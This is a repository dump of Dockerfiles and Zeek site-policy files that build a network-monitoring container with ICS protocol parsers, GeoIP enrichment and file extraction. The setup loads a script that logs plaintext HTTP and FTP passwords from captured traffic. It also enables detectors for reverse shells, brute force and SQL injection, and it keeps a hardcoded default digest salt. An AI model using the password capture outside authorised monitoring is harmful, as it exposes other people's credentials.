57 | && mv file-extraction/scripts /usr/local/zeek/share/zeek/site/file-extraction
58 |
59 | RUN echo "===> Installing Community-Id..." \
60 | && cd /tmp \
61 | && git clone https://github.com/corelight/zeek-community-id.git \
62 | && cd /tmp/zeek-community-id \
63 | && CC=clang ./configure --zeek-dist=/tmp/zeek \
64 | && cd /tmp/zeek-community-id/build \
65 | && make -j 2 \
66 | && make install \
67 | && /usr/local/zeek/bin/zeek -NN Corelight::CommunityID
68 |
69 | RUN echo "===> Installing icsnpp-s7comm..." \
70 | && cd /tmp \
71 | && git clone https://github.com/cisagov/icsnpp-s7comm.git \
72 | && cd /tmp/icsnpp-s7comm/ \
73 | && CC=clang ./configure --zeek-dist=/tmp/zeek \
74 | && make -j 2 \
75 | && make install \
76 | && /usr/local/zeek/bin/zeek -NN ICSNPP::S7COMM
77 |
78 |
79 |
80 | RUN echo "===> Installing icsnpp-modbus..." \
81 | && cd /tmp \
82 | && git clone https://github.com/cisagov/icsnpp-modbus.git \
83 | && mv icsnpp-modbus/scripts/ /usr/local/zeek/share/zeek/site/icsnpp-modbus
84 |
85 | RUN echo "===> Installing corelight/json-streaming-logs package..." \
86 | && cd /tmp \
87 | && git clone https://github.com/corelight/json-streaming-logs.git json-streaming-logs \
88 | && find json-streaming-logs -name "*.bro" -exec sh -c 'mv "$1" "${1%.bro}.zeek"' _ {} \; \
89 | && mv json-streaming-logs/scripts /usr/local/zeek/share/zeek/site/json-streaming-logs
90 |
91 | # RUN echo "===> Shrinking image..." \
92 | # && strip -s /usr/local/zeek/bin/zeek
93 |
94 | RUN echo "===> Size of the Zeek install..." \
95 | && du -sh /usr/local/zeek
96 | ####################################################################################################
97 | FROM alpine:3.12 as geoip
98 |
99 | ENV MAXMIND_CITY https://geolite.maxmind.com/download/geoip/database/GeoLite2-City.tar.gz
100 | ENV MAXMIND_CNTRY https://geolite.maxmind.com/download/geoip/database/GeoLite2-Country.tar.gz
101 | ENV MAXMIND_ASN http://geolite.maxmind.com/download/geoip/database/GeoLite2-ASN.tar.gz
102 | ENV GITHUB_CITY https://github.com/blacktop/docker-zeek/raw/master/maxmind/GeoLite2-City.tar.gz
103 | ENV GITHUB_CNTRY https://github.com/blacktop/docker-zeek/raw/master/maxmind/GeoLite2-Country.tar.gz
104 |
105 | # Install the GeoIPLite Database
106 | RUN cd /tmp \
107 | && mkdir -p /usr/share/GeoIP \
108 | && wget ${GITHUB_CITY} \
109 | && tar xzvf GeoLite2-City.tar.gz \
110 | && mv GeoLite2-City*/GeoLite2-City.mmdb /usr/share/GeoIP/
111 | # && wget ${MAXMIND_ASN} \
112 | # && tar xzvf GeoLite2-ASN.tar.gz \
113 | # && mv GeoLite2-ASN*/GeoLite2-ASN.mmdb /usr/share/GeoIP/
114 | ####################################################################################################
115 | FROM alpine:3.14
116 |
117 | LABEL maintainer "Nikhil"
118 |
119 | RUN apk --no-cache add ca-certificates zlib openssl libstdc++ libpcap libgcc fts libmaxminddb
120 |
121 | COPY --from=builder /usr/local/zeek /usr/local/zeek
122 | COPY local.zeek /usr/local/zeek/share/zeek/site/local.zeek
123 |
124 | # Add a few zeek scripts
125 | ADD https://raw.githubusercontent.com/blacktop/docker-zeek/master/scripts/conn-add-geodata.zeek \
126 | /usr/local/zeek/share/zeek/site/geodata/conn-add-geodata.zeek
127 | ADD https://raw.githubusercontent.com/blacktop/docker-zeek/master/scripts/log-passwords.zeek \
128 | /usr/local/zeek/share/zeek/site/passwords/log-passwords.zeek
129 |
130 | COPY --from=geoip /usr/share/GeoIP /usr/share/GeoIP
131 |
132 | WORKDIR /pcap
133 |
134 | ENV ZEEKPATH .:/data/config:/usr/local/zeek/share/zeek:/usr/local/zeek/share/zeek/policy:/usr/local/zeek/share/zeek/site
135 | ENV PATH $PATH:/usr/local/zeek/bin
136 |
137 | # RUN apk add py3-pip
138 | # RUN pip3 install GitPython semantic-version
139 | # RUN pip3 install zkg
140 | # RUN export GIT_PYTHON_REFRESH=quiet
141 | # RUN zkg autoconfig
142 | # RUN zkg refresh
143 | # RUN zkg install icsnpp-modbus
144 |
145 | # RUN zkg refresh
146 | # RUN zkg install icsnpp-s7comm
147 |
148 | ENTRYPOINT ["zeek"]
149 |
150 |
--------------------------------------------------------------------------------
/zeek/zeek/elastic/local.zeek:
--------------------------------------------------------------------------------
1 | ##! Local site policy. Customize as appropriate.
2 | ##!
3 | ##! This file will not be overwritten when upgrading or reinstalling!
4 |
5 | # Installation-wide salt value that is used in some digest hashes, e.g., for
6 | # the creation of file IDs. Please change this to a hard to guess value.
7 | redef digest_salt = "blacktop";
8 |
9 | # This script logs which scripts were loaded during each run.
10 | @load misc/loaded-scripts
11 |
12 | # Apply the default tuning scripts for common tuning settings.
13 | @load tuning/defaults
14 |
15 | # Estimate and log capture loss.
16 | @load misc/capture-loss
17 |
18 | # Enable logging of memory, packet and lag statistics.
19 | @load misc/stats
20 |
21 | # Load the scan detection script. It's disabled by default because
22 | # it often causes performance issues.
23 | @load misc/scan
24 |
25 | # Detect traceroute being run on the network. This could possibly cause
26 | # performance trouble when there are a lot of traceroutes on your network.
27 | # Enable cautiously.
28 | #@load misc/detect-traceroute
29 |
30 | # Generate notices when vulnerable versions of software are discovered.
31 | # The default is to only monitor software found in the address space defined
32 | # as "local". Refer to the software framework's documentation for more
33 | # information.
34 | @load frameworks/software/vulnerable
35 |
36 | # Detect software changing (e.g. attacker installing hacked SSHD).
37 | @load frameworks/software/version-changes
38 |
39 | # This adds signatures to detect cleartext forward and reverse windows shells.
40 | @load-sigs frameworks/signatures/detect-windows-shells
41 |
42 | # Load all of the scripts that detect software in various protocols.
43 | @load protocols/ftp/software
44 | @load protocols/smtp/software
45 | @load protocols/ssh/software
46 | @load protocols/http/software
47 | # The detect-webapps script could possibly cause performance trouble when
48 | # running on live traffic. Enable it cautiously.
49 | @load protocols/http/detect-webapps
50 |
51 | # This script detects DNS results pointing toward your Site::local_nets
52 | # where the name is not part of your local DNS zone and is being hosted
53 | # externally. Requires that the Site::local_zones variable is defined.
54 | @load protocols/dns/detect-external-names
55 |
56 | # Script to detect various activity in FTP sessions.
57 | @load protocols/ftp/detect
58 |
59 | # Scripts that do asset tracking.
60 | @load protocols/conn/known-hosts
61 | @load protocols/conn/known-services
62 | @load protocols/ssl/known-certs
63 |
64 | # Script load ICS CISA
65 | # @load cisagov
66 |
67 | # This script enables SSL/TLS certificate validation.
68 | @load protocols/ssl/validate-certs
69 |
70 | # This script prevents the logging of SSL CA certificates in x509.log
71 | @load protocols/ssl/log-hostcerts-only
72 |
73 | # If you have GeoIP support built in, do some geographic detections and
74 | # logging for SSH traffic.
75 | @load protocols/ssh/geo-data
76 | # Detect hosts doing SSH bruteforce attacks.
77 | @load protocols/ssh/detect-bruteforcing
78 | # Detect logins using "interesting" hostnames.
79 | @load protocols/ssh/interesting-hostnames
80 |
81 | # Detect SQL injection attacks.
82 | @load protocols/http/detect-sqli
83 |
84 | #### Network File Handling ####
85 |
86 | # Enable MD5 and SHA1 hashing for all files.
87 | @load frameworks/files/hash-all-files
88 |
89 | # Detect SHA1 sums in Team Cymru's Malware Hash Registry.
90 | @load frameworks/files/detect-MHR
91 |
92 | # Extend email alerting to include hostnames
93 | @load policy/frameworks/notice/extend-email/hostnames
94 |
95 | # Uncomment the following line to enable detection of the heartbleed attack. Enabling
96 | # this might impact performance a bit.
97 | @load policy/protocols/ssl/heartbleed
98 |
99 | # Uncomment the following line to enable logging of connection VLANs. Enabling
100 | # this adds two VLAN fields to the conn.log file.
101 | @load policy/protocols/conn/vlan-logging
102 |
103 | # Uncomment the following line to enable logging of link-layer addresses. Enabling
104 | # this adds the link-layer address for each connection endpoint to the conn.log file.
105 | @load policy/protocols/conn/mac-logging
106 |
107 | # Comment this to unload Corelight/CommunityID
108 | @load Corelight/CommunityID
109 |
110 | # Custom conn geoip enrichment
111 | @load geodata/conn-add-geodata.zeek
112 | # Log all plain-text http/ftp passwords
113 | @load passwords/log-passwords.zeek
114 |
115 | @load file-extraction
116 |
117 | # JSON Plugin
118 | # @load json-streaming-logs
119 | # redef JSONStreaming::disable_default_logs=T;
120 | redef LogAscii::use_json=T;
121 |
122 |
123 |
124 | #ICS Protocol
125 | @load icsnpp/s7comm
126 |
127 | #@load icsnpp-enip
128 |
129 | #@load icsnpp-dnp3
130 |
131 | @load icsnpp-modbus
--------------------------------------------------------------------------------
/zeek/zeek/zeekctl/.dockerignore:
--------------------------------------------------------------------------------
1 | # Ignore .git folder
2 | .git*
3 |
4 | build
5 | extract_files
6 | CHANGELOG.md
7 | LICENSE
8 | Makefile
9 | README.md
10 | README.md.bu
11 | VERSION
12 | circle.yml
13 | docker-compose.yml
14 | logo.png
15 |
--------------------------------------------------------------------------------
/zeek/zeek/zeekctl/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM alpine:3.14 as builder
2 |
3 |
4 | ENV ZEEK_VERSION 4.1.1
5 |
6 | RUN apk add --no-cache zlib openssl libstdc++ libpcap libgcc
7 | RUN apk add --no-cache -t .build-deps \
8 | bsd-compat-headers \
9 | libmaxminddb-dev \
10 | linux-headers \
11 | openssl-dev \
12 | libpcap-dev \
13 | python3-dev \
14 | zlib-dev \
15 | binutils \
16 | fts-dev \
17 | cmake \
18 | clang \
19 | bison \
20 | bash \
21 | swig \
22 | perl \
23 | make \
24 | flex \
25 | git \
26 | g++ \
27 | fts
28 |
29 | RUN echo "===> Cloning zeek..." \
30 | && cd /tmp \
31 | && git clone --recursive --branch v$ZEEK_VERSION https://github.com/zeek/zeek.git
32 |
33 | RUN echo "===> Compiling zeek..." \
34 | && cd /tmp/zeek \
35 | && CC=clang ./configure --prefix=/usr/local/zeek \
36 | --build-type=Release \
37 | --disable-broker-tests \
38 | --disable-auxtools \
39 | && make -j 2 \
40 | && make install
41 |
42 | RUN echo "===> Compiling af_packet plugin..." \
43 | && cd /tmp/zeek/auxil/ \
44 | && git clone https://github.com/J-Gras/zeek-af_packet-plugin.git \
45 | && cd /tmp/zeek/auxil/zeek-af_packet-plugin \
46 | && CC=clang ./configure --with-kernel=/usr --zeek-dist=/tmp/zeek \
47 | && make -j 2 \
48 | && make install \
49 | && /usr/local/zeek/bin/zeek -NN Zeek::AF_Packet
50 |
51 | RUN echo "===> Installing hosom/file-extraction package..." \
52 | && cd /tmp \
53 | && git clone https://github.com/hosom/file-extraction.git \
54 | && mv file-extraction/scripts /usr/local/zeek/share/zeek/site/file-extraction
55 |
56 | RUN echo "===> Installing Community-Id..." \
57 | && cd /tmp \
58 | && git clone https://github.com/corelight/zeek-community-id.git \
59 | && cd /tmp/zeek-community-id \
60 | && CC=clang ./configure --zeek-dist=/tmp/zeek \
61 | && cd /tmp/zeek-community-id/build \
62 | && make -j 2 \
63 | && make install \
64 | && /usr/local/zeek/bin/zeek -NN Corelight::CommunityID
65 |
66 | RUN echo "===> Shrinking image..." \
67 | && strip -s /usr/local/zeek/bin/zeek
68 |
69 | RUN echo "===> Size of the Zeek install..." \
70 | && du -sh /usr/local/zeek
71 | ####################################################################################################
72 | FROM alpine:3.14
73 |
74 |
75 | RUN apk --no-cache add ca-certificates zlib openssl libstdc++ libpcap libmaxminddb libgcc fts python3 bash
76 |
77 | COPY --from=builder /usr/local/zeek /usr/local/zeek
78 | COPY local.zeek /usr/local/zeek/share/zeek/site/local.zeek
79 |
80 | # Add a few zeek scripts
81 | ADD https://raw.githubusercontent.com/blacktop/docker-zeek/master/scripts/conn-add-geodata.zeek \
82 | /usr/local/zeek/share/zeek/site/geodata/conn-add-geodata.zeek
83 | ADD https://raw.githubusercontent.com/blacktop/docker-zeek/master/scripts/log-passwords.zeek \
84 | /usr/local/zeek/share/zeek/site/passwords/log-passwords.zeek
85 |
86 | WORKDIR /pcap
87 |
88 | ENV ZEEKPATH .:/data/config:/usr/local/zeek/share/zeek:/usr/local/zeek/share/zeek/policy:/usr/local/zeek/share/zeek/site
89 | ENV PATH $PATH:/usr/local/zeek/bin
90 |
91 | RUN zkg refresh
92 | RUN zkg install icsnpp-modbus
93 |
94 | RUN zkg refresh
95 | RUN zkg install icsnpp-s7comm
96 |
97 | ENTRYPOINT ["zeek"]
98 | CMD ["-h"]
99 |
--------------------------------------------------------------------------------
/zeek/zeek/zeekctl/hooks/post_push:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | set -e
4 |
5 | VERSION=$(cat Dockerfile | grep '^ENV ZEEK_VERSION' | cut -d" " -f3)
6 | IMAGE_TAG=$(cut -d ":" -f 2 <<< "$IMAGE_NAME")
7 | TAGS=($VERSION 3)
8 |
9 | for TAG in "${TAGS[@]}"; do
10 | echo "===> Tagging $IMAGE_NAME as $DOCKER_REPO:$IMAGE_TAG-$TAG"
11 | docker tag $IMAGE_NAME $DOCKER_REPO:$IMAGE_TAG-$TAG
12 | echo "===> Pushing $DOCKER_REPO:$IMAGE_TAG-$TAG"
13 | docker push $DOCKER_REPO:$IMAGE_TAG-$TAG
14 | done
15 |
--------------------------------------------------------------------------------
/zeek/zeek/zeekctl/local.zeek:
--------------------------------------------------------------------------------
1 | ##! Local site policy. Customize as appropriate.
2 | ##!
3 | ##! This file will not be overwritten when upgrading or reinstalling!
4 |
5 | # Installation-wide salt value that is used in some digest hashes, e.g., for
6 | # the creation of file IDs. Please change this to a hard to guess value.
7 | redef digest_salt = "blacktop";
8 |
9 | # This script logs which scripts were loaded during each run.
10 | @load misc/loaded-scripts
11 |
12 | # Apply the default tuning scripts for common tuning settings.
13 | @load tuning/defaults
14 |
15 | # Estimate and log capture loss.
16 | @load misc/capture-loss
17 |
18 | # Enable logging of memory, packet and lag statistics.
19 | @load misc/stats
20 |
21 | # Load the scan detection script. It's disabled by default because
22 | # it often causes performance issues.
23 | #@load misc/scan
24 |
25 | # Detect traceroute being run on the network. This could possibly cause
26 | # performance trouble when there are a lot of traceroutes on your network.
27 | # Enable cautiously.
28 | #@load misc/detect-traceroute
29 |
30 | # Generate notices when vulnerable versions of software are discovered.
31 | # The default is to only monitor software found in the address space defined
32 | # as "local". Refer to the software framework's documentation for more
33 | # information.
34 | @load frameworks/software/vulnerable
35 |
36 | # Detect software changing (e.g. attacker installing hacked SSHD).
37 | @load frameworks/software/version-changes
38 |
39 | # This adds signatures to detect cleartext forward and reverse windows shells.
40 | @load-sigs frameworks/signatures/detect-windows-shells
41 |
42 | # Load all of the scripts that detect software in various protocols.
43 | @load protocols/ftp/software
44 | @load protocols/smtp/software
45 | @load protocols/ssh/software
46 | @load protocols/http/software
47 | # The detect-webapps script could possibly cause performance trouble when
48 | # running on live traffic. Enable it cautiously.
49 | #@load protocols/http/detect-webapps
50 |
51 | # This script detects DNS results pointing toward your Site::local_nets
52 | # where the name is not part of your local DNS zone and is being hosted
53 | # externally. Requires that the Site::local_zones variable is defined.
54 | @load protocols/dns/detect-external-names
55 |
56 | # Script to detect various activity in FTP sessions.
57 | @load protocols/ftp/detect
58 |
59 | # Scripts that do asset tracking.
60 | @load protocols/conn/known-hosts
61 | @load protocols/conn/known-services
62 | @load protocols/ssl/known-certs
63 |
64 | # This script enables SSL/TLS certificate validation.
65 | @load protocols/ssl/validate-certs
66 |
67 | # This script prevents the logging of SSL CA certificates in x509.log
68 | @load protocols/ssl/log-hostcerts-only
69 |
70 | # If you have GeoIP support built in, do some geographic detections and
71 | # logging for SSH traffic.
72 | @load protocols/ssh/geo-data
73 | # Detect hosts doing SSH bruteforce attacks.
74 | @load protocols/ssh/detect-bruteforcing
75 | # Detect logins using "interesting" hostnames.
76 | @load protocols/ssh/interesting-hostnames
77 |
78 | # Detect SQL injection attacks.
79 | @load protocols/http/detect-sqli
80 |
81 | #### Network File Handling ####
82 |
83 | # Enable MD5 and SHA1 hashing for all files.
84 | @load frameworks/files/hash-all-files
85 |
86 | # Detect SHA1 sums in Team Cymru's Malware Hash Registry.
87 | @load frameworks/files/detect-MHR
88 |
89 | # Extend email alerting to include hostnames
90 | @load policy/frameworks/notice/extend-email/hostnames
91 |
92 | # Uncomment the following line to enable detection of the heartbleed attack. Enabling
93 | # this might impact performance a bit.
94 | # @load policy/protocols/ssl/heartbleed
95 |
96 | # Uncomment the following line to enable logging of connection VLANs. Enabling
97 | # this adds two VLAN fields to the conn.log file.
98 | # @load policy/protocols/conn/vlan-logging
99 |
100 | # Uncomment the following line to enable logging of link-layer addresses. Enabling
101 | # this adds the link-layer address for each connection endpoint to the conn.log file.
102 | # @load policy/protocols/conn/mac-logging
103 |
104 | # Uncomment this to source zkg's package state
105 | # @load packages
106 |
107 | # Comment this to unload Corelight/CommunityID
108 | @load Corelight/CommunityID
109 |
110 |
111 | #ICS Protocol
112 | #@load icsnpp/s7comm
113 |
114 | #@load icsnpp-enip
115 |
116 | #@load icsnpp-dnp3
117 |
118 | #@load icsnpp-modbus
--------------------------------------------------------------------------------